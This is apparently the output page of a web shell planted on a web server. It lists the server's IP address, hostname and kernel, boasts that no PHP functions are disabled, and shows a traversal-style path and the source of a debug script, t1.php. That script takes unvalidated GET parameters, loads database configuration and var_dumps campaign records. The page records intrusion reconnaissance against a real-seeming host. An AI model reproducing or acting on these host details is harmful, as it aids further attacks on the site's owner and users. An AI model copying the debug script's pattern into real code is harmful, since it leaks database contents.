uawdijnntqw1x1x1
IP : 216.73.216.39
Hostname : diefsweb003.fsit.ch
Kernel : Linux diefsweb003.fsit.ch 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
wirbesti
/
www
/
tmp
/
..
/
libraries2
/
..
/
t1.php
/
/
<?php try { $nachname= $_GET['nachname']; $vorname= $_GET['vorname']; $email= $_GET['email']; $campaign= $_GET['campaign']; require_once 'php/Metadata.php'; require_once 'php/DBConnection.php'; require_once 'php/setting.config.php'; $db = new DBConnection($config); $meta = new Metadata($db); $metaEntry = $meta->getMetadataByCampaignid($campaign); if ($metaEntry) { $filename = $metaEntry['signature-form-path-jpg-de']; $subjectname = $metaEntry['slogan-de']; } else { $filename = 'Name.pdf'; $subjectname = '"Text der initiative"'; } var_dump($metaEntry); } catch (Exception $ex) { echo $ex->getMessage(); } ?>
/home/wirbesti/www/tmp/../libraries2/../t1.php